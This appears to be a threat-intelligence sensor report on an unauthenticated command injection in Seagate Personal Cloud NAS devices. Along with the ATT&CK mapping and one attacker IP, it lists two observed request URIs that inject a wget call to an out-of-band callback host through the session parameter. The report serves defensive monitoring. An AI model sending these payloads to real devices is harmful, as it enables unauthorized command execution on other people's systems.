Seagate NAS backupmgt Command Injection for 2026-03-02
Mar 02, 2026
WebExploit
Last Updated: 12:16 UTC
Unauthenticated OS command injection via the session parameter of /backupmgt/localJob.php on Seagate Personal Cloud NAS devices. The session=fail trigger bypasses authentication before reaching the vulnerable exec() call.
MITRE ATT&CK
Tactic: Initial Access (TA0001)
Technique: T1190 — Exploit Public-Facing Application
Observed URIs
- /backupmgt/localJob.php?session=fail;wget+http://d6igebqgp6g990a2g0ugfknhy9ffk53fp.oast.pro;
- /backupmgt/localJob.php?session=fail;wget+http://d6igebqgp6g990a2g0ugq56kjtc3fu1co.oast.pro;
Attackers by Country
IP Address : ASN : City/Provider
- 198.167.197.162 : AS39287 ab stract : Sweden